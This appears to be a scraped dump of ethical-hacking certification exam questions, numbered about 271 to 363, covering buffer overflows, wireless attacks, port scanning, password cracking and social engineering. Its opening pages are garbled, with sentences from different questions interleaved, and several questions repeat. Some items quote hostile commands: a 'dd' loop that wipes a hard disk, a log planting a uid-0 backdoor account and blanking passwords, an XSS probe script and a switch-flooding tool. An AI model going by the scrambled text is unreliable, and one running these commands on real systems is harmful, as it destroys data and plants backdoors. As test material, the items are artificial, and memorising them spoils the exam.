58.239.561 ms 54.22) 53. 271 Henry is an attacker and wants to gain control of a system and use it to flood a target system with requests.10.005 ms 51.41) 50.

The attack was social engineering and the firewall did not detect it C. The attack was deception and security was not directly compromised D. Security was not compromised as the webpage was hosted internally 275 The GET method should never be used when sensitive data such as credit is being sent to a CGI program. which are used in the RSA PKI mathematical process. This means that anyone with access to a server log will be able to obtain this information. Dave successfully embeds a keylogger. Visitors were allowed to click on a sand clock to mark the progress of the test.com/creditcard. Replace the GET with POST method when sending data B. The firewall protects the network well and allows strict Internet access. the stack should stop because it cannot hold any more data. The attack did not fall through as the firewall blocked the traffic B. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Factorization 17 . Encrypt the data before you send using GET method 276 Which of the following best describes session key creation in SSL? A. If (I < 200) then exit (1) C.xsecurity-bank. This is because any GET command will appear in the URL and will be logged by any servers. It is created by the client after verifying the server's identity 277 One of the most common and the best way of cracking RSA encryption is to being to derive the two prime numbers. How would you protect from this type of attack? A. It is created by the server after verifying theuser's identity B. Never include sensitive information in a script C. let's say that you've entered your credit card information into a form that uses the GET method.asp?cardnumber=454543433532234 The GET method appends the credit card number to the URL. If the two numbers p and q are discovered through a _________________ process. then the private key can be derived.D place “HTTP: NO CRAWL” on the html pages that you don’t want the crawlers to index 273 Choose one of the following pseudo codes to describe this statement: If we have written 200 characters to the buffer variable. He also added some statistics on the webpage. Use HTTOS SSLV3 to send the data instead of plain HTTPS D. If (I >= 200) then exit (1) 274 Dave has been assigned to test the network security of Acme Corp. How was security compromised and how did the firewall respond? A. A. The test was announced to the employees. For example. A. The URL may appear like this: https://www. It is created by the client from the server's public key D. It is created by the server upon connection by the client C. If (I <= 200) then exit (1) D. If (I > 200) then exit (1) B.

Steven examines the following Ethereal captures: A. Give users two passwords D.B. D. Bob discovers that throughput has dropped by almost half even though the number of users has remained the same. a security analyst for XYZ associates. Samuel notices a pop up at the bottom of his screen stating that his computer was now connected to a wireless network. Give user the least amount of privileges C. Using a VPN on wireless automatically enables WEP. After benchmarsheets the network’s speed. the attacker will attempt to increase his privileges by escalating the used account to one that has increased privileges. Brute-forcing 278 In an attempt to secure his wireless network. The stronger encryption used by the VPN slows down the network. SYN Flood 281 Once an intruder has gained access to a remote system with a valid username and password. What would be the best countermeasure to protect against escalation of priveges? A. Samuel is a straight 'A' student who really likes tinkering around with computers and other types of electronic devices. strcat() C. ARP Spoofing C. he was able to get online and surf the Internet. streadd() D. such as that of an administrator. Prime Detection C. VPNs use larger packets then wireless networks normally do. All of a sudden. Bob implements a VPN to cover the wireless communications. Give users a strong policy document 282 Samuel is high school teenager who lives in Modesto California. which causes additional overhead. strscock() 280 Steven. strcpy() B. Using a VPN with wireless doubles the overheard on an access point for all direct client to access point communications. Immediately after the implementation. While tweaking the registry. C. B. 279 Which of the following built-in C/C++ functions you should avoid to prevent your program from buffer overflow attacks? A. Smurf Attack B. users begin complaining about how slow the wireless network is. Hashing D. Samuel just received a new laptop for his birthday and has been configuring it ever since. Ping of Death D. Give users tokens B. is analyzing packets captured by Ethereal on a Linux Server inside his network when the server starts to slow down tremendously. Why does this happen in the VPN over wireless implementation? A. Samuel did some quick research and was able to gain access to the wireless router 18 .

tripwire B nessus C saint D satan 286 You receive an e-email with the following text message A – virus hoax B spooky virus C stealth virus D polymorphic virus 287 The following is an entry captured by a network IDS. 0xFFFFFFFFFFFF B. He injects broadcast frames onto the wire to conduct MiTM attack. 0xAAAAAAAAAAAA C. 0xDDDDDDDDDDDD 284 How many bits encryption does SHA-1 use? A. The next day Samuel's fried said that he could drive around all over town and pick up hundred of wireless networks. Webdriving 283 John the hacker is sniffing the network to inject ARP packets. What is the destination MAC address of a broadcast frame? A. Warchalking D. You are assigned the task of analyzing this entry. You figure that the attacker is attempting a buffer overflow attack. What has Samuel and his friend just performed? A. This really excited Samuel so they got into his friend's car and drove around the city seeing which networks they could connect to and which ones they could not. 256 bits 285 Harold has just been hired on as the senior network administrator for the university of central Michigan. You notice the value 0x90. As an analyst what would you conclude about the attack? 19 .he was connecting to and see al of its settings? Being able to hop onto someone else's wireless network so easily fascinated Samuel so he began doing more and more research on wireless technologies and how to exploit them. 160 bits D. 0xBBBBBBBBBBBB D. You also notice "/bin/sh" in the ASCII part of the output.000 client computers. Warwalking C. 128 bits C. Wardriving B. 64 bits B. A . which is the most common NOOP instruction for the Intel processor. He essentiablly is in charge of 200 servers and about 10.

In order to perform the actions you intend to do. He ran Tripwire against the entire Web site. He disconnected his laptop from the corporate internal network and used his modem to dial up the same ISP used by Smith. Joseph saw the intact Mason Insurance web site. Stealth keylogger C. 464 290 You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 Server. The attacker is attempting an exploit that launches a command-line shell 288 Joseph was the Web site administrator for the Mason Insurance in New York.A. ARP spoofing B. reconnected to the internal network. How did the attacker accomplish this hack? A. Joseph called a friend of his at his home to help troubleshoot the problem. Which of the following options would be your current privileges? A. 389 C. and determined that every system file and all the Web content on the server were intact. Covert keylogger B. To help make sense of this problem. So. The buffer overflow attack has been neutralized by the IDSS B. Software keylogger D. Joseph received an urgent phone call from his friend. which was directly connected to Mason Insurance's internal network. No changes were apparent. Routing table injection 289 What port number is used by LDAP protocol? A. Smith. 445 D. 110 B. the Web site looked completely intact. You need to know what your current privileges are within the shell. LOCAL_SYSTEM D. Joseph uses his laptop computer regularly to administer the Web site.masonins. SQL injection C.masonins. The Web site appeared defaced when his friend visited using his DSL connection. the main Mason Insurance web site had been vandalized! All of its normal content was removed and replaced with an attacker's message ''Hacker Message: You are dead! Freaks!'' From his office. In his browser. The attacker is creating a directory on the compromised machine C. and used Secure Shell (SSH) to log in directly to the Web server. Administrator B. IUSR_COMPUTERNAME C. One night. Whatever account IIS was installed with 291 Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products? A. The attacker is attempting a buffer overflow attack and has succeeded D. According to Smith. he quickly typed www. Hardware keylogger 20 . you need elevated permission. Joseph surfed to the Web site using his laptop. The server allows you to spawn a shell. After his modem connected. Joseph decided to access the Web site using his dial-up ISP.com in his browser to reveal the following web page: H@cker Mess@ge: Y0u @re De@d! Fre@ks! After seeing the defaced Web site. DNS poisoning D. he disconnected his dial-up line.com. while Smith and his friend could see the defaced page. who's main Web site was located at www.

The law states: Section1 of the Act refers to unauthorized access to computer material. C. and can access Brown Co. This states that a person commits an offence if he causes a computer to perform any function with intent to secure unauthorized access to any program or data held in any computer. Jack calls Jane. 294 Jack Hacker wants to break into Brown Co. It used TCP as the underlying protocol.'s computers and obtain their secret double fudge cookie recipe. an accountant at Brown Co.5 kernel. to find the cookie recipe. It uses community string that is transmitted in clear text. He renamed the Administrator account to a new name that can't be easily guessed but there remain people who attempt to compromise his newly renamed administrator account.292 Jonathan being a keen administrator has followed all of the best practices he could find on securing his Windows Server. Faking Identity 295 Jim's organization has just completed a major Linux roll out and now all of the organization's systems are running the Linux 2. Spoofing Identity E. This protocol has long been used by hackers to gather great amount of information about remote hosts. The attacker used the user2sid program C. and devices about performance or health status data. How can a remote attacker decipher the name of the administrator account if it has been renamed? A. Social Engineering C. Reverse Engineering D. D. This is an example of what kind of attack? A. B. The attacker used to sid2user program D. servers. The organization requires an option to control network traffic and also perform stateful inspection of traffic going into and out of the DMZ. IP Tables B.. and tells him her password. Which of the following features makes this possible? (Choose two) A. Jane believes that Jack is really an administrator. Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password 'just to double check our records'. The attacker used NMAP with the V option 293 SNMP is a protocol used to query hosts. Jack now has a user name and password. pretending to be an administrator from Brown Co. The attacker guessed the new name B. 21 . It is susceptible to sniffing. IP ICMP 296 The United Kingdom (UK) he passed a law that makes hacking into an unauthorized network a felony. Which built-in functionality of Linux can achieve this? A.'s computers. The roll out expenses has posed constraints on purchasing other essential security equipment and software. Reverse Psychology B. IP Chains C. IP Sniffer D. It is used by all network devices on the market.

Cyber Space Crime Act 1995 297 Bob has a good understanding of cryptography. For conviction to succeed there must have been the intent to cause the modifications and knowledge that the modification had not been authorized What is the law called? A. integrity and enable strong authentication but it cannot mitigate programming errors. Even if it is not possible to prove the intent to commit the further offence. Which of the following ethereal filters will you configure to display only the packets with the hotmail messages? A. Cryptography is used to secure data from specific threat. Section 2 of the deals with unauthorized access with intent to commit or facilitate the commission of further offences. the Section 1 offence is still committed. Computer incident Act 2000 C. Bob can explain that by using passwords to derive cryptographic keys it is a form of a programming error. Bob can explain that a random generator can be used to derive cryptographic keys but it uses a weak seed value and it is a form of programming error. Bob can explain that by using a weak key management technique it is a form of programming error. What is a good example of a programming error that Bob can use to illustrate to the management that encryption will not address all of their security concerns? A. This section is designed to deal with common-or-graden hacking. B. (http contains "e-mail" ) && (http contains "hotmail") C. (http contains "hotmail") && ( http contains "Reply-To") B. You want to sniff their email message traversing the unprotected WiFi network. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique. having worked with it for many years.passport. You see lots of people using their laptops browsing the web while snipping brewed coffee from JonDonalds. which generally means the creation and distribution of viruses.com" ) && (http contains "SMTP") D. D. Computer Misuse Act 1990 B. (http = "login. C. Cyber Crime Law Act 2003 D.For a successful conviction under this part of the Act. the prosecution must prove that the access secured is unauthorized and that the suspect knew that this was the case.com" ) && (http contains "POP3") 299 22 . Section 3 Offences cover unauthorized modification of computer material. but it does not secure the application from coding errors.passport. It can provide data privacy. 298 You are sniffing as unprotected WiFi network located in a JonDonalds Cybercafe with Ethereal to capture hotmail e-mail traffic. An offence is committed under Section 2 if a Section 1 offence has been committed and there is the intention of committing or facilitating a further offense (any offence which attacks a custodial sentence of more than five years. not necessarily one covered but the Act). (http = "login.

Replay attacks B. 3 23 . Crafted Channel C. Joseph's company has already researched using smart cards and all the resources needed to implement them. Covert Channel B. Biometric device C. Joseph has been instructed on the Company's strict security policies that have been implemented and the policies that have yet to be put in place. Proximity cards 300 What type of port scan is shown below? A. XMAS Scan D. What type of device should Joseph use for two-factor authentication? A. SYN Stealth Scan 301 How would you describe a simple yet very effective mechanism for sending and receiving unauthorized information or data between machines without alerting any firewalls and IDS's on a network? A. 2 C. Session hijacking attacks D. Idle Scan B. but found the smart cards to not be cost effective. Bounce Channel D. OTP D. 1 B.Joseph has just been hired on to a contractor company of the Department of Defense as their senior Security Analyst. False 304 ARP poisoning is achieved in _____ steps A. Per the Department of Defense. True B. Joseph's supervisor has told him that they would like to use some type of hardware device in tandem with a security or identifying pin number. Joseph has been delegated the task of researching and implementing the best two-factor authentication method for his company. all DoD users and the users of their contractors must use two-factor authentication to access their networks. Password cracking attacks 303 Data is sent over the network as clear text (unencrypted) when Basic Authentication is configured on Web Servers. Security token B. Windows Scan C. A. Deceptive Channel 302 What hacking attack is challenge/response authentication used to prevent? A. Scanning attacks C.

He wonders if his firewall has been breached. Eric has a Wingate package providing FTP redirection on his network D.D. A. What would be your inference? A. 110 B. 4 305 What port number is used by LDAP protocol? A. Eric network has been penetrated by a firewall breach B. The attacker is using the ICMP protocol to have a covert channel C. What would be your inference? A. The attacker is using the ICMP protocol to have a covert channel C. Eric has a Wingate package providing FTP redirection on his network D. He wonders if his firewall has been breached. This flag releases the connection resources. host A can continue to receive data as long as the SYN sequence number of transmitted packets from host B are lower than the packet segment containing the set FIN flag. Eric network has been penetrated by a firewall breach B. He learns that the protocol being used is designed to allow a host outside of a firewall to connect transparently and securely through the firewall. False 307 Eric notices repeated probes to port 1080. 445 D.txt file in the root of your website with listing of directories that you don’t want to be crawled. Somebody is using SOCKS on the network to communicate through the firewall 309 www wanderers or spiders are programs that traverse many pages in the world wide web by recursively retrieving linked pages. True B. A place robots. Somebody is using SOCKS on the network to communicate through the firewall 308 Eric notices repeated probes to port 1080. However. 389 C. B place authentication on root directories that will prevent crawling from these spiders C enable SSL on restricted directories which will block these spiders from crawling D place “HTTP: NO CRAWL” on the html pages that you don’t want the crawlers to index 273 311 Johnny is a member of the hacking group orpheus1. 464 306 The FIN flag is set and sent from host A to host B when host A has no more data to transmit (Closing a TCP connection). He is currently working on 24 . He learns that the protocol being used is designed to allow a host outside of a firewall to connect transparently and securely through the firewall.

C. Johnny wants to crack the administrator password. PSCrack 312 When referring to the Domain Name Service.xsecurity. He was able to get into the server. thereby bypassing your firewall. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password. Conduct a needs analysis C. A – link:www. Hashes are sent in clear text over the network. but does not have a lot of time to crack it. The employee explains that he used the modem because he had to download software for a department project. located in a DMZ. what is denoted by a 'zone'? A. During one of your periodic checks to see how well policy is being observed by the employees. Which of the following are known weaknesses of LM? (Choose three) A.xsecurity. RainbowCrack B. 315 You are the Security Administrator of Xtrinity.xsecurity. How would you resolve this situation? A. It is the first domain that belongs to a company. Reconfigure the firewall B. Enforce the corporate security policy 316 a hacker would typically use a botnet to send a large number of queries to open DNS servers. D. B. You write security policies and conduct assesments to protect the company's network.com 314 Windows LAN Manager (LM) hashes are known to be weak. What tool would be best used to accomplish this? A. by using an unused service account that had a very weak password that he was able to guess. Effective length is 7 characters. It is a collection of domains.com domain using google search engine. A security breach has occurred as a direct result of this activity. It is a collection of resource records. SMBCrack C. B. A – DNS reflector and amplification attack B DNS cache poisoning attacks C dns reverse connection attacks 25 . Install a network-based IDS D. Converts passwords to uppercase. 313 You are footprinting the www.breaking into the Department of Defense's front end exchange server. Inc. He has used this modem to dial in to his workstation. D. C.com B – search?|:www. you discover an employee has attached a modem to his telephone line and workstation. Makes use of only 32 bit encryption. It is the first resource record type in the SOA. SmurfCrack D.

They report that they are under a denial of service attack.D dns forward lookup attacks 317 While performing ping scans into a target network you get a frantic call from the organization's security team. After some investigation he realizes that the intruders are using a proxy somewhere else on the Internet which has been scripted to enable the random usage of various proxies on each request so as not to get caught by the firewall use. Do not scan the broadcast IP. C. it would take 45 seconds to return to the user to begin another attempt. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the firewall manually C. You can't completely block the intruders attempt if they constantly switch proxies 319 While doing a penetration test. Enforce a password policy and use account lockouts after three wrong logon attempts even through this might lock out legit users B. How can you modify your scan to prevent triggering this event in the IDS? A. the smurf attack event stops showing up on the organization's IDS monitor. Since an intruder may use multiple machines to brute force the password. He is trying to configure his firewall to block password brute force attempts on his network. 318 Samuel is the network administrator of DataX communications Inc. When you stop your scan. he also throttles the number of connections that will be prepared to accept from a particular IP address. Oklahoma. Scan more slowly. What are the alternatives to defending against possible brute-force password attacks on his site? A. you discover that the organization is using one domain for web publishing and another domain for administrator and business operations. A –active attack B – port scanning C vulnerability mapping D passive information gathering 320 Steven is a senior security analyst for a state agency in Tulsa. Enforce complex password policy on your network so that passwords are more difficult to brute force D. He enables blocking the intruder's IP address for a period of 24 hours time after more than three unsuccessful attempts. Later he adds another rule to his firewall and enables small sleep on the password attempt so that if the password is incorrect. Samuel wants to completely block hackers brute force attempts on his network. The firm first sets up a sniffer on the agency's wired network to capture a reasonable amount of traffic to 26 . But he still receives hundreds of thousands brute-force attempts generated from various IP addresses around the world. B. Only scan the Windows systems. Spoof the source IP address. This action will slow the intruder's attempts. The consulting firm is halfway through the audit and is preparing to perform the actual penetration testing against the agency's network. His agency is currently undergoing a mandated security audit by an outside consulting firm. D. He is confident that this rule will secure his network hackers on the Internet.

Merge Streams C. Steganography B. This takes approximately 2 hours to obtain 10 GB of data. or display to traditional file browsing utilities like dir or Windows Explorer A. A 5.analyze later. IRC Channel B. Because wireless traffic uses only UDP which is easier to sniff D. abcd326 What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System? A. NetBIOS vulnerability D. The monitor will know if counterfeit messages are being generated because they will not be encrypted C.462 Ghz D 900MHz-2. GoogleTalk 324 Buffer overflows are one of the top flaws for exploitation on the internet today. Why did capturing of traffic take much less time on the wireless network? A.462 GHz C 2. Because all traffic is clear text. Alternate Data Streams 322 You come across a wifi network in your neighborhood.323-2. MSN Messenger C. Encryption of agent communications will conceal the presence of the agents B. Because wireless access points act like hubs on a network B. Trojan Client Software D.412-2. An intruder could intercept and delete data or alerts and the intrusion can go Stack based buffer overflow Active buffer overflow Dynamic buffer overflow Heap based buffer overflow 27 . Alerts are sent to the monitor when a potential intrusion is detected D. This capture only takes about 30 minutes to get 10 GB of data.825 GHZ B 2.462 GHz 323 Hackers usually control Bots through: A. even when encrypted C. Because wireless networks can't enable encryption 321 _____ is found in all versions of NTFS and is described as the ability to fork file data into existing files without affecting their functionality. Yahoo Chat E. The consulting firm then sets up a sniffer on the agency's wireless network to capture the same amount of traffic. size.15-5.

328 You are programming a buffer overflow exploit and want to create a NOP sled of 200 bytes in the program exploit. A UDP Scan D. Using a VPN on wireless automatically enables WEP. A FIN Scan B. She is not concerned about being stealth at this point. Using a VPN with wireless doubles the overheard on an access point for all direct client to access point communications. The sniffing interface cannot be detected. While researching on that particular brand of IDS you notice that its default installation allows it to perform sniffing and attack analysis on one NIC and caters to its management and reporting on another NIC. D. Bob discovers that throughput has dropped by almost half even though the number of users has remained the same. C.org and other leading security organizations has clearly showed a steady rise in the number of hacking incidents perpetrated against companies. how can you detect these sniffing interfaces? A. Set your IP to that of the IDS and look for it as it attempts to knock your computer off the network. Send your attack traffic and look for it to be dropped by the IDS. you come across a press release by a security products vendor stating that they have signed a multi-million dollar agreement with the company you are targeting.Undetected 327 In an attempt to secure his wireless network. Why does this happen in the VPN over wireless implementation? A. The contract was for vulnerability assessment tools and network based IDS systems. which causes additional overhead. VPNs use larger packets then wireless networks normally do. The sniffing interface is completely unbound from the TCP/IP stack by default. C. Which of the following type of scans would be the most accurate and reliable? A. What do you thin is the main reason behind the significant increase in hacking attempts over the past 28 . Immediately after the implementation. A Half Scan C. Bob implements a VPN to cover the wireless communications. users begin complaining about how slow the wireless network is. B. Use a ping flood against the IP of the sniffing NIC and look for latency in the responses. The TCP Connect Scan 330 During the intelligence gathering phase of a penetration test. Assuming the defaults were used.c A 0x90 B 0x80 C 0x70 D 0x60 329 Nathalie would like to perform a reliable scan against a remote target. B. After benchmarsheets the network’s speed. 331 Statistics from cert. The stronger encryption used by the VPN slows down the network. D.

Lori has never done a vulnerability scan before. Information gathering C. One of the option is to choose which ports that can be scanned. What is Paula seeing happen on this computer? A. Tool like Nessus will cause BSOD 334 Which type of attack is port scanning? A. Paula has just received a call from a user reporting that his computer just displayed a Blue Screen of Death screen and he ca no longer work. so she decides to download a free one off the Internet. Denial of service attack 335 Which of the following activities would not be considered passive footprinting? A. how many ports should she select in the software? A. Search on financial site such as Yahoo Financial B. Web server attack B. Lori wants to do exactly what her boos has told her. The user said he stepped away from his computer for only 15 minutes and when he got back. If Lori is supposed to scan all known TCP ports. the Blue Screen was there. but she does not know ports should be scanned. New TCP/IP stack features are constantly being added. Lori should not scan TCP ports. There is a phenomenal increase in processing power. There was IRQ conflict in Paula's PC D. 1024 C. Paula knew this should not be the case since the computer should be completely frozen during a Blue screen. D. C. It is getting more challenging and harder to hack for non technical people. Perform multiple queries through a search engine 29 . only UDP ports 333 Paula works as the primary help desk contact for her company. The user's computer is running Windows XP. The ease with which hacker tools are available on the Internet. She has been instructed to perform a very thorough test of the network to ensure that there are no security holes on any of the machines. Unauthorized access D. 65536 B. B. Paula's Netwrok was scanned using Dumpsec C. 332 Lori has just been tasked by her supervisor conduct vulnerability scan on the corporate network. but the Blue screen looks like a familiar one that Paula had seen a Windows 2000 Computers periodically. so she is unsure of some of the settings available in the software she downloaded. 1025 D. Paula's Network was scanned using FloppyScan B. She checks the network IDS live log entries and notices numerous nmap scan alerts. Paula walks over to the user's computer and sees the Blue Screen of Death screen. Lori's company does not own any commercial scanning products. Paula also noticed that the hard drive activity light was flashing meaning that the computer was processing some thing.years? A.

Bill decides to use Geotrace to find out where the suspect IP is originates from. anonymous user account set as default. and IDS without notice because they are inside legal HTTP requests. He has also read that when an organization deploys a web application. Bill receives a number of calls from customers that can't access the company website and can't purchase anything online. filters. broken account and session management. which comes pre-installed with Windows XP. New Installation of Windows Should be patched by installation the latest service packs and hotfixes B. anonymous user account set as default. but the help desk manager says that he has not. No IDS configured. Install the latest signatures for Antivirus software E.C. Scan the range of IP address found in their DNS databas D. Go through the rubbish to find out any information that might have been discarded 336 Bret is a web application administrator and has just read that there are a number of surprisingly common web application vulnerabilities that can be exploited by unsophisticated attackers with easily available tools on the Internet. You want to connect Ethernet wire to your cable modem and start using the computer immediately. missing latest security patch. no firewall filters set and no SSL configured are just a few common vulnerabilities D. Non-validated parameters. and there are a few things that you must do before you use it. broken access control. What are some common vulnerabilities in web applications that he should be concerned about? A. Enable "guest" account C. A. Windows is dangerously insecure when unpacked from the box. no firewall filters set and an inattentive system administrator are just a few common vulnerabilities 337 You just purchased the latest DELL computer. Bill asks the help desk manager if he has received any calls about slowness from the end users. Bret is determined to weed out any vulnerabilities. Install a personal firewall and lock down unused ports from connecting to your computer D. no firewall filters set and visible clear text passwords are just a few common vulnerabilities C. SSL. The Geotrace utility runs a traceroute and finds that IP is coming from Panama. missing latest security patch. missing latest security patch. cross-side scripting and buffer overflows are just a few common vulnerabilities B. Configure "Windows Update" to automatic F. anonymous user account set as default. No SSL configured. Bill knows that none of his customers are in Panama so he immediately thinks that his 30 . Visible clear text passwords. Create a non-admin user with a complex password and login to this account 339 Bill has started to notice some slowness on his network when trying to update his company's website while trying to access the website from the Internet. Bill logs on to a couple of this routers and notices that the logs shows network traffic is at all time high. platform hardening. Attacks buried in these requests sail past firewalls. He also notices that almost all the traffic is originating from a specific address. they invite the world to send HTTP requests. McAfee antivirus software and a host of other applications.

He is wiping the contents of the hard disk with zeros D. C. APNIC 340 Which definition among those given below best describes a covert channel? A. You have discovered 23 live systems and after scanning each of them you notice that they all show port 21 in closed state.i<1. Now Bill needs to find out more about the originating IP Address. 342 John Beetlesman. Perform a ping sweep to identify any additional systems that might be up. Upon performing various tasks.536 bytes. What should be the next logical step that should be performed? A. is analyzing packets captured by Ethereal on a Linux Server inside his network when the server starts to slow down tremendously. It is the multiplexing taking place on a communication link. D. From the information given. The tool size of this ICMP packet once reconstructed is over 65. SYN Flood D. He is making a bit stream copy of the entire hard disk for later download B. RIPELACNIC D. Smurf B. What Internet registry should Bill look in to find the IP Address? A. Connect to open ports to discover applications. LACNIC B. ARP Spoofing 31 . Inc's WebServer running Apache.He has downloaded sensitive documents and database files off the machine.i++)). Steven examines the following Ethereal captures: A. A server program using a port that is not well known. the hacker has successfully compromised the Linux System of Agent Telecommunications. Beetlesman finally runs the following command on the Linux box before disconnecting. Ping of Death 344 Steven. Fraggle C. 341 You are conducting a port scan on a subnet that has ICMP blocked. He is infecting the hard disk with random virus strings 343 Bryce the bad boy is purposely sending fragmented ICMP packets to a remote target. D. Smurf Attack B. for((i=0. Rescan every computer to verify the results. It is one of the weak channels used by WEP which makes it insecure. a security analyst for XYZ associates. B.company is under a Denial of Service attack. Perform a SYN scan on port 21 to identify any additional systems that might be up.do ?dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda done What exactly is John trying to do? A. ARIN C. He is deleting log files to remove his trace C. C. what type of attack is Bryce attempting to perform? A. B. Making use of a protocol in a way it is not intended to be used.

Image Hide 349 After studying the following log entries. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd 3. Jack has been sweeping the network but has not been able to get any responses from the remote target. ICMP is filtered by a gateway D. this knowledge has a risk associated with it. The destination network might be down F. 346 Jack is conducting a port scan of a target network.etc 2. Gif-It-Up C. Make obtaining either a computer security certification or accreditation easier to achieve so more individuals feel that they are a part of something larger than life. However. NiceText D. Cygwin is a free Unix subsystem that runs on top of Windows C. The packet TTL value is too low and can't reach the target 347 What is Cygwin? A. Check all of the following that could be a likely cause of the lack of response? A. UDP is filtered by a gateway C. Educate everyone with books. D. how many user IDs can you identify that the attacker has tampered with? 1. passwd nobody -d 6. Snow B. articles and training on risk analysis. Cygwin is a free C++ compiler that runs on Windows B. The host might be down B. Hire more computer security monitoring personnel to monitor computer systems and networks. C. Cygwin is a X Windows GUI subsytem that runs on top of Linux GNOME environment 348 Which of the following steganography utilities exploits the nature of white space and allows the user to conceal information in these white spaces? A. He knows that his target network has a web server and that a mail server is up and running. Ping of Death D.etcpasswd 4. Train more National Guard and reservist in the art of computer security to help out in times of emergency or crises. mkdir -p /etc/X11/applnk/Internet/.C. In this context.etc 5. SYN Flood 345 Bob is acknowledged as a hacker of repute and is popular among visitors of "underground" sites. touch -acmr /etc /etc/X11/applnk/Internet/. passwd dns -d 32 . The TCP window Size does not match E. vulnerabilities and safeguards. Cygwin is a free Windows subsystem that runs on top of Linux D. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash 7. what would be the most affective method to bridge the knowledge gap between the "black" hats or crackers and the "white" hats or computer security professionals? (Choose the test answer) A. and many have expressed their interest in learning from him. Bob is willing to share his knowledge with those who are willing to learn. B. as it can be used for malevolent attacks as well. mkdir -p /etc/X11/applnk/Internet/.

8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd 9. touch -acmr /etc/X11/applnk/Internet/.etc /etc A. IUSR_ B. acmr, dns C. nobody, dns D. nobody, IUSR_ 350 What attack is being depicted here? A. Cookie Stealing B. Session Hijacking C. Cross Site scripting D. Parameter Manipulation 351 On a backdoored Linux box there is a possibility that legitimate programs are modified or trojaned. How is it possible to list processes and uids associated with them in a more reliable manner? A. Use "Is" B. Use "lsof" C. Use "echo" D. Use "netstat" 353 Two months later, a group of hackers called “hackjihad” found a way to access the one-time password list issued to customers of jaco banking systems. A – implement biometrics based password authentication system B configure your firewall to block attempts of more than three wrong tries C implement rsa secureid based authentication system 354 A simple compiler technique used by programmers is to add a terminator 'canary word' containing four letters NULL (0x00), CR (0x0d), LF (0x0a) and EOF (0xff) so that most string operations are terminated. If the canary word has been altered when the function returns, and the program responds by emitting an intruder alert into syslog, and then halts what does it indicate? A. The system has crashed B. A buffer overflow attack has been attempted C. A buffer overflow attack has already occurred D. A firewall has been breached and this is logged E. An intrusion detection system has been triggered 355 While testing web applications, you attempt to insert the following test script into the search area on the company's web site: <script>alert('Testing Testing Testing')</script> Afterwards, when you press the search button, a pop up box appears on your screen with the text "Testing Testing Testing". What vulnerability is detected in the web application here?

33

A. A hybrid attack B. A buffer overflow C. Password attacks D. Cross Site Scripting 356 Ethernet switches can be adversely affected by rapidly bombarding them with spoofed ARP responses. He port to MAC Address table (CAM Table) overflows on the switch and rather than failing completely, moves into broadcast mode, then the hacker can sniff all of the packets on the network. Which of the following tool achieves this? A. ./macof B. ./sniffof C. ./dnsiff D. ./switchsnarf 357 Spears Technology, Inc is a software development company located in Los Angeles, California. They reported a breach in security, stating that its "security defenses has been breached and exploited for 2 weeks by hackers. "The hackers had accessed and downloaded 90,000 address containing customer credit cards and password. Spears Technology found this attack to be so to law enforcement officials to protect their intellectual property. How did this attack occur? The intruder entered through an employees home machine, which was connected to Spears Technology, Inc's corporate VPN network. The application called BEAST Trojan was used in the attack to open a "Back Door" allowing the hackers undetected access. The security breach was discovered when customers complained about the usage of their credit cards without their knowledge. The hackers were traced back to Beijing China through e-mail address evidence. The credit card information was sent to that same e-mail address. The passwords allowed the hackers to access Spears Technology's network from a remote location, posing as employees. The intent of the attacker was to steal the source code for their VOIP system and "hold it hostage" from Spears Technology, Inc exchange for ransom. The hackers had intended on selling the stolen VOIP software source code to competitors. How would you prevent such attacks from occurring in the future at Spears Technology? A. Disable VPN access to all your employees from home machines B. Allow VPN access but replace the standard authentication with biometric authentication C. Replace the VPN access with dial-up modem access to the company's network D. Enable 25 character complex password policy for employees to access the VPN network. 358 Liza has forgotten her password to an online bookstore. The web application asks her to key in her email so that they can send her the password. Liza enters her email liza@yahoo.com'. The application displays server error. What is wrong with the web application? A. The email is not valid B. User input is not sanitized C. The web server may be down D. The ISP connection is not reliable 359

34

Jake works as a system administrator at Acme Corp. Jason, an accountant of the firm befriends him at the canteen and tags along with him on the pretext of appraising him about potential tax benefits. Jason waits for Jake to swipe his access card and follows him through the open door into the secure systems area. How would you describe Jason's behavior within a security context? A. Trailing B. Tailgating C. Swipe Gating D. Smooth Talking 360 Dan is conducting a penetration testing and has found a vulnerability in a Web Application which gave him the sessionID token via a cross site scripting vulnerability. Dan wants to replay this token. However, the session ID manager (on the server) checks the originating IP address as well. Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might not be able to get an interactive session? A. Dan cannot spoof his IP address over TCP network B. The server will send replies back to the spoofed IP address C. Dan can establish an interactive session only if he uses a NAT D. The scenario is incorrect as Dan can spoof his IP and get responses 361 Basically, there are two approaches to network intrusion detection: signature detection, and anomaly detection. The signature detection approach utilizes well-known signatures for network traffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previous history of network traffic to search for patterns that are abnormal, which would indicate an intrusion. How can an attacker disguise his buffer overflow attack signature such that there is a greater probability of his attack going undetected by the IDS? A. He can use a shellcode that will perform a reverse telnet back to his machine B. He can use a dynamic return address to overwrite the correct value in the target machine computer memory C. He can chain NOOP instructions into a NOOP "sled" that advances the processor's instruction pointer to a random place of choice D. He can use polymorphic shell code-with a tool such as ADMmutate - to change the signature of his exploit as seen by a network IDS 362 You are performing a port scan with nmap. You are in hurry and conducting the scans at the fastest possible speed. However, you don't want to sacrifice reliability for speed. If stealth is not an issue, what type of scan should you run to get very reliable results? A. XMAS scan B. Stealth scan C. Connect scan D. Fragmented packet scan 363 Certkiller .com is legally liable for the content of email that is sent from its systems, regardless of whether the message was sent for private or business-related purpose. This could lead to prosecution for the sender and for the company's directors if, for example, outgoing email was found to contain material that was pornographic, racist or likely to incite someone to commit an act of terrorism.

35

